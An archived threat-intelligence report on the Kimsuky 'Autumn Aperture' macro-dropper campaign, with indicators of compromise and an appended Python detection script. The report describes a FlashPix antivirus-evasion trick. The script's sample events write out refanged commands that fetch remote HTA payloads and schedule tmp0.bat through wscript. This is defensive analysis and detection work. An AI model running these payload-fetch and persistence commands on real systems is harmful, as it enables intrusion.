{
	"id": "02691282-e163-4aa5-8347-878703383dc8",
	"created_at": "2026-04-06T00:19:27.981193Z",
	"updated_at": "2026-04-10T13:12:23.193085Z",
	"deleted_at": null,
	"sha1_hash": "22aa97fbe1774e71f2aca9357996022211cf9d81",
	"title": "Autumn Aperture Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 779238,
	"plain_text": "Autumn Aperture Report\r\nPublished: 2019-09-11 · Archived: 2026-04-05 18:37:33 UTC\r\nAutumn Aperture: Threat Campaign Highlights New Evasion Technique using an Antiquated File Format\r\nOverview\r\nIn what is assessed to be an expansion of a coordinated effort to target U.S.-based entities, an emerging and increasingly sophisticated campaign employing obscure file formats poses significant risk — and highlights the need for vigilance around third-party relations.\r\nAfter detecting several related trojanized documents — all discussing nuclear deterrence, North Korea’s nuclear submarine program, and North Korean economic sanctions — Prevailion has determined the existence of a coordinated threat campaign. We have dubbed the campaign “Autumn Aperture” and have attributed it — with moderate confidence — to the Kimsuky (a.k.a. “Smoke Screen”) threat actors.\r\nTo increase the effectiveness of their campaign, the threat actors obtained documents written by industry experts and embedded their malware in these Microsoft Word files. Document metadata indicates that these operations occurred throughout the summer of 2019, with the most recent wave of documents likely sent around 20 August 2019.\r\nThis campaign also marked an evolution in the threat actors’ techniques, as they shifted to a more obscure file format (Kodak FlashPix), resulting in a significantly lower detection rate by anti-virus (AV) products.\r\nWe hypothesize that these documents, sent via a socially engineered email, would likely have been anticipated by the intended victims, thus increasing the threat actors’ chance of success. Some document examples include:\r\nTrojanizing a conference speaker’s notes after his presentation at the Nuclear Deterrence Summit.\r\nTrojanizing a report from a U.S. university affiliate discussing North Korea’s new ballistic missile submarine (SSB) capabilities.\r\nImpersonating the U.S. Department of the Treasury and sending a renewal notice for a sanctions license.\r\nAutumn Aperture’s increasingly sophisticated tools still rely on a common email delivery mechanism that can be incorporated into an organization’s risk mitigation plans. Given the scope of entities targeted by this campaign, there is an increased likelihood that a third party within an organization’s ecosystem is at risk of exposure.\r\nBased on the indicators of compromise we’ve collected on Autumn Aperture, we encourage organizations to assess existing risk profiles, review emergency response plans, and ensure that employees know to immediately contact the appropriate IT or network security resource if they are prompted to enable macros on any document.\r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 1 of 11\r\nTechnical Details\r\nTrojanized Documents\r\nThe most recent document associated with this campaign was titled “NK new SSB shown with Kim 22-7-2019”. Document metadata shows that this document was created by a U.S.-based university affiliate and, despite its title, was modified on 20 August by the threat actors.\r\nConsistent with historical trends, the threat actors continued to trojanize genuine documents. Throughout this campaign, when victims opened the documents, the document displayed a prompt to enable macros. Once macros were enabled, the document would then display its content — in this case, a report on the construction of a new ballistic missile submarine (SSB) facility — while surreptitiously installing additional malware on the victim’s computer.\r\nSSB phishing lure used to target victims\r\nWe also discovered another malicious document, likely deployed earlier this summer. This document used the same technique, embedding images with instructions to enable macros. Once macros were enabled, the user would see a document that appeared to be from the U.S. Treasury Department, granting the Carnegie Corporation of New York a sanctions license. As before, enabling macros allowed the malware to install additional payloads on the victim’s computer.\r\nNorth Korea sanctions regulations lure\r\nIn one particular case, we identified a Bitly link that was sent to some victims of this campaign. When the Bitly link was expanded, it revealed the underlying actor-controlled URL. Additionally, the expansion page showed how many people had clicked the link and when. If a victim visited the URL, the resulting webpage would download a RAR file, which contained a trojanized document summarizing a talk from the Nuclear Deterrence Summit.\r\nWhile we observed multiple iterations of this lure, metadata shows that the original document was created by a speaker at the Nuclear Deterrence Summit and then modified by the threat actors. The content of this lure suggests that it was likely targeted at conference attendees and/or others who had an interest in what took place at the conference.\r\nThis particular document was previously referenced in a report by ESTSecurity, and its embedded domain was included in a report by the Agence Nationale de la Sécurité des Systèmes d'Information (ANSSI). This indicates that the Autumn Aperture campaign was likely a continuation of previously reported activity from this threat group.\r\nNuclear Deterrence summit lure\r\nVisual Basic Scripts and Kodak FlashPix Format Files\r\nEarlier in 2019, the trojanized documents contained a very small, simple macro that ran automatically when the document was opened and called mshta.exe to run an HTML Application (HTA) file. The threat actors have since fortified their documents with several new functions, such as enumerating the host machine, and have experimented with password-protecting their documents.\r\nAnother feature would call Windows Management Instrumentation (WMI) to determine whether it was safe to obtain the next payload on the host machine. The dropper would obtain a list of running processes and services, then compare that output to a list of known anti-virus products. In July, the script would check for the presence of the following anti-virus products:\r\nMalwarebytes\r\nWindows Defender\r\nMcAfee\r\nIn August, the threat actors added functionality to also check for:\r\nSophos\r\nTrend Micro\r\nScreenshot of the anti-detection checks used in the July campaign\r\nOnce the dropper determined that it was safe to run on the host machine, it would perform some host-based enumeration by attempting to obtain stored credentials. As in earlier campaigns, the dropper would use mshta.exe to obtain the HTA payloads hosted on compromised domains. The downloaded payload would be saved as %APPDATA%\\tmp0.bat. The script would then create a scheduled task to run the payload using wscript.exe.\r\nThe last new feature of the script would attempt to obtain the application’s version number — in most cases this would likely be the version of Microsoft Word — and then send the result to another actor-compromised domain, pirha[.]net/p/php?op=[version number].\r\nScreenshot of the application version feature\r\nTo hide this new functionality, the threat actor embedded it in a Kodak FlashPix (FPX) format file. According to VirusTotal testing, the FPX file format has a significantly lower detection rate, dropping the initial detection rate to 8/57 AV products, whereas the equivalent sample in the standard VBA format had an initial detection rate of 23/57.\r\nScreenshot of the FPX detection rate on 23 July 2019\r\nScreenshot of the VBA detection rate on 9 June 2019\r\nThis is likely because AV products have numerous signatures designed to inspect VBA content, while FPX files have not received the same level of scrutiny. As a result, FPX files are less likely to be flagged as malicious. We found samples suggesting that the threat actors have been using this file format since at least July.\r\nConclusion\r\nThese threat actors’ TTPs are evolving and continue to be refined with each new operation. While this type of operation did require some user interaction (pressing the enable-macros button), the malware would do the rest in the background, hidden from the victim.\r\nThis technique follows a wider trend that we are observing across multiple threat actor groups, in which they socially engineer victims with an image rather than relying on an exploit. Several actors are creating more robust droppers to better protect their tool sets and increase their chances of operating without discovery. These changes reflect a highly motivated threat actor, likely to continue performing operations.\r\nWhile the TTPs continue to evolve and increase in sophistication, this campaign still relies on a relatively simple but effective email fraud attack method. Business email compromise (BEC) — the traditional document delivery method used in the Autumn Aperture campaign — is the leading driver of insurance giant AIG’s Europe, Middle East \u0026 Africa (EMEA) region cyber insurance claims.\r\nBEC incidents are a growing threat, up from 11% of AIG EMEA’s reported cyber claims in 2017 to 23% in 2018. AIG EMEA’s 2018 cyber claims data indicates that a wide range of sectors are vulnerable to BEC attacks, with professional services, financial services, business services, and public entity \u0026 non-profit industries accounting for almost 60% of all 2018 claims. (1)\r\nGiven the broad scope of entities targeted by Autumn Aperture, there is an increased likelihood that a third party within an organization’s ecosystem is at risk of exposure. Based on this information and the indicators of compromise Prevailion has collected on Autumn Aperture, we encourage organizations to assess existing risk profiles, review emergency response plans, and ensure that employees know to immediately contact the appropriate IT or network security resource if prompted to enable macros on a downloaded document. For more information about threat modeling and third-party risk mitigation, attend Elizabeth’s talk on September 12th at the Tactical Edges International CISOs Summit.\r\n(1) Cyber Claims: GDPR and business email compromise drive greater frequencies; https://www.aig.co.uk/content/dam/aig/emea/regional-assets/documents/aig-cyber-claims-2019.pdf\r\nIndicators of Compromise\r\nFile Hashes\r\n039285c83a25291bd91608daaac2941e4abc4c6eff97e02fe0991918e101201f\r\nbfca0a3a506b770948475b09bee6e5613e2080e37802b52f8162366a83c4c3ae\r\na09aec4ecafabb4ae607bb25cbdb96f00ccc1d2dd49e941e07cd4ad292a58441\r\ne8145f09c83163bbe429f5a5c282b57e7921e7b40339820389522146516604b1\r\nc60e9c71460e4f583da8179a606eb2f84412e003b00096c9f699fa3d2854eb7b\r\nd1b5d606c866c304c3eb28fc52ed700c6b292e6e4387e0dac1a895e231bfe5b3\r\n9255280904f85d01545d295a31038678d697325385be6c7c01435d541f16b043\r\n23c18fe6675b4dad5e1354718fa9bbb096ded4293948d318d0057b51642c4cbb\r\n63c45dd760256bb2bee1eeb9e7d61601c90a752ff46832df39ca1a8d2376b281\r\naead266f97c936799f4d5f526482d41f74daf86f8fcf49976eecbc6260b59274\r\n327426b389a87fb41c5150f18c8a3b1b5c671eb08107a3a6917baea3db686555\r\nbf838c2e46696f79964709e29880604d7172f2a3ab0f3f41d7ff8216f053c557\r\n0dc17133b9d54b8d38f5a4f4c49eb0cee7ff2c80b1ea614fb59ca49c3721440b\r\nf408dee7fa76179d826885c5c6f38acbcc11f3e3abba1f1f58068cdf833b4317\r\n3b2701a7d49a8d6002a2a202bac9b18b4bc917009da01591ab5b66f183f9c8e9\r\n01313c4e2c821d7d57ec5d60a7b4f6364e3a0cb3715e8a626853dd9a8ef005b7\r\nfc3a75ace13d53d00aef19b7b72b2742ecf5734292680d3106176cf64d1fee18\r\nb862add44ef0d3418aa82fd674da2d7446c7a293844a4986414f96d8aae2d58f\r\ndc5d140c772a63252753f51f98feb4066996a1bc77ff13aa77d4764fccd01cd4\r\n4aaaaf94ba870fa7b500883154c7da1f9639ecdd76af42ee9fe408970d6f24d3\r\n82286cf6369eddd2e79d005a435623abe2db642c216d38550411865acf84210e\r\n9c6f6db86b5ccdda884369c9c52dd8568733e126e6fe9c2350707bb6d59744a1\r\nac4f6bdd6d4ef009f1108c4c8a3d58e0a19d4f73b239202dd601b0aeba5ceb54\r\nf602b7ed04cd538bead5a7fe79913ea273546a996baee33fedf2ecd417efae78\r\nad0d0c84025f978975a7cdde4eabc2457ba414a696601d33ea6e071bbbfbf5f3\r\n5531d6a9b70c612a897a80b43d001f9329badb8b26be27d14645f42abb689400\r\nURLs\r\nhxxps://pirha[.]net/1.php?op=\r\nhxxps://somalidoc[.]com/generator/data/js/Vamva0[.]hta\r\nhxxps://www[.]webfindsolucoes[.]com/wp-includes/widgets/fred/Rnlnb0[.]hta\r\nhxxps://www[.]eventosatitlan[.]com/includes/includes/js/ja/Qbjoo0[.]hta\r\nhxxps://www[.]atnitalia[.]com/wp-includes/js/tinymce/utils/share/Lfvbu0[.]hta\r\nhxxp://atnitalia[.]com/wp-includes/js/tinymce/utils/share/upload[.]php\r\nhxxp://evangelia[.]edu/image/bin/Rjboi0[.]hta\r\nhxxps://login-main[.]bigwnet[.]com/attachment/view/Msgxo0[.]hta\r\nAbout Prevailion\r\nPrevailion is a compromise intelligence company, transforming the way organizations approach risk mitigation and business decision-making. Through next-level tailored intelligence and a zero-touch platform, Prevailion provides confirmed evidence of compromise for customers and their partner ecosystems.\r\nSource: https://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html"
	],
	"report_names": [
		"autumn-aperture-report.html"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43",
				"ARCHIPELAGO",
				"Black Banshee",
				"Crooked Pisces",
				"Emerald Sleet",
				"ITG16",
				"Kimsuky",
				"Larva-24005",
				"Opal Sleet",
				"Ruby Sleet",
				"SharpTongue",
				"Sparking Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"THALLIUM",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434767,
	"ts_updated_at": 1775826743,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/22aa97fbe1774e71f2aca9357996022211cf9d81.pdf",
		"text": "https://archive.orkl.eu/22aa97fbe1774e71f2aca9357996022211cf9d81.txt",
		"img": "https://archive.orkl.eu/22aa97fbe1774e71f2aca9357996022211cf9d81.jpg"
	}
}
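Added example, not code from the Prevailion report or from the ORKL record above: Python detection logic for the dropper chain the report's Technical Details describe (a Word document spawning mshta.exe with a remote HTA URL, the payload written to %APPDATA%\tmp0.bat, a scheduled task that runs it through wscript.exe, and the application-version beacon to pirha[.]net), together with refanging of the report's defanged URL IOCs and a lookup against three of its SHA-256 hashes. The Sysmon-style event records, host names, user path, task name and Office version string are constructed for the example; the beacon path follows the /1.php?op= form given in the report's IOC list.

```python
r"""
Behavioural detection for the Autumn Aperture dropper chain: Office spawning
mshta.exe with a remote .hta, the payload written to %APPDATA%\tmp0.bat, a
scheduled task running it via wscript.exe, and the version beacon to pirha[.]net.
Added example: IOCs are copied from the report, the events below are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Defanged URL IOCs as listed in the report.
IOC_URLS = [
    "hxxps://pirha[.]net/1.php?op=",
    "hxxps://somalidoc[.]com/generator/data/js/Vamva0[.]hta",
    "hxxps://www[.]webfindsolucoes[.]com/wp-includes/widgets/fred/Rnlnb0[.]hta",
    "hxxps://www[.]eventosatitlan[.]com/includes/includes/js/ja/Qbjoo0[.]hta",
    "hxxps://www[.]atnitalia[.]com/wp-includes/js/tinymce/utils/share/Lfvbu0[.]hta",
    "hxxp://atnitalia[.]com/wp-includes/js/tinymce/utils/share/upload[.]php",
    "hxxp://evangelia[.]edu/image/bin/Rjboi0[.]hta",
    "hxxps://login-main[.]bigwnet[.]com/attachment/view/Msgxo0[.]hta",
]
# Three of the report's SHA-256 hashes; extend with the full list in production.
IOC_SHA256 = {
    "039285c83a25291bd91608daaac2941e4abc4c6eff97e02fe0991918e101201f",
    "bfca0a3a506b770948475b09bee6e5613e2080e37802b52f8162366a83c4c3ae",
    "5531d6a9b70c612a897a80b43d001f9329badb8b26be27d14645f42abb689400",
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
TMP0_RE = re.compile(r"\\AppData\\Roaming\\tmp0\.bat$", re.I)


def refang(ioc: str) -> str:
    """Turn a defanged indicator (hxxp, [.]) back into a parseable URL."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


IOC_HOSTS = {urlsplit(refang(u)).hostname for u in IOC_URLS}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hash_hit(sha256: str) -> bool:
    return sha256.lower() in IOC_SHA256


def classify(ev: dict) -> list:
    """Return the names of the detections a single event triggers."""
    hits = []
    if ev["type"] == "process_create":
        image = basename(ev["image"])
        parent = basename(ev.get("parent_image", ""))
        cmd = ev.get("command_line", "")
        if image == "mshta.exe":
            urls = URL_RE.findall(cmd)
            if parent in OFFICE_APPS and urls:            # Word -> mshta.exe <url>
                hits.append("office_spawns_mshta_with_url")
            if any(urlsplit(u).hostname in IOC_HOSTS for u in urls):
                hits.append("mshta_fetches_known_hta_host")
        low = cmd.lower()
        if image == "schtasks.exe" and "/create" in low and "wscript" in low and "appdata" in low:
            hits.append("schtask_runs_wscript_from_appdata")
    elif ev["type"] == "file_create" and TMP0_RE.search(ev["target"]):
        hits.append("appdata_tmp0_bat_written")
    elif ev["type"] == "network":
        parts = urlsplit(refang(ev["url"]))              # tolerate defanged proxy logs
        if parts.hostname == "pirha.net" and parts.path == "/1.php":
            hits.append("office_version_beacon")          # .../1.php?op=<version>
        elif parts.hostname in IOC_HOSTS:
            hits.append("known_c2_host_contacted")
    return hits


def analyze(events: list) -> dict:
    """Per host: every hit, plus whether two or more distinct stages of the chain fired."""
    per_host = defaultdict(list)
    for ev in events:
        hits = classify(ev)
        if hits:
            per_host[ev["host"]].extend(hits)
    return {h: {"hits": hits, "chain": len(set(hits)) >= 2} for h, hits in per_host.items()}


# Constructed Sysmon-style telemetry (user path, task name and version string are invented).
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "process_create",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"WINWORD.EXE" "C:\Users\a\Downloads\NK new SSB shown with Kim 22-7-2019.doc"'},
    {"host": "ws01", "type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "mshta.exe https://somalidoc.com/generator/data/js/Vamva0.hta"},
    {"host": "ws01", "type": "file_create", "target": r"C:\Users\a\AppData\Roaming\tmp0.bat"},
    {"host": "ws01", "type": "process_create", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'schtasks /create /sc minute /mo 10 /tn Update /tr "wscript.exe C:\Users\a\AppData\Roaming\tmp0.bat"'},
    {"host": "ws01", "type": "network", "url": "https://pirha.net/1.php?op=16.0.11929.20300"},
    {"host": "ws02", "type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": r"mshta.exe C:\Tools\helper.hta"},
]

if __name__ == "__main__":
    for host, result in analyze(SAMPLE_EVENTS).items():
        print(host, "CHAIN" if result["chain"] else "single hit", sorted(set(result["hits"])))
```

Run directly, the script reports ws01 as a full chain and stays silent on ws02, where mshta.exe was launched from Explorer with a local file and no Office parent: a single benign-looking stage is not enough, the chain flag needs at least two distinct stages on the same host. The WMI anti-virus enumeration the report describes is not modelled, because it runs inside the Word process and leaves no child process to key on; the stages that do cross a process or network boundary are the ones worth alerting on.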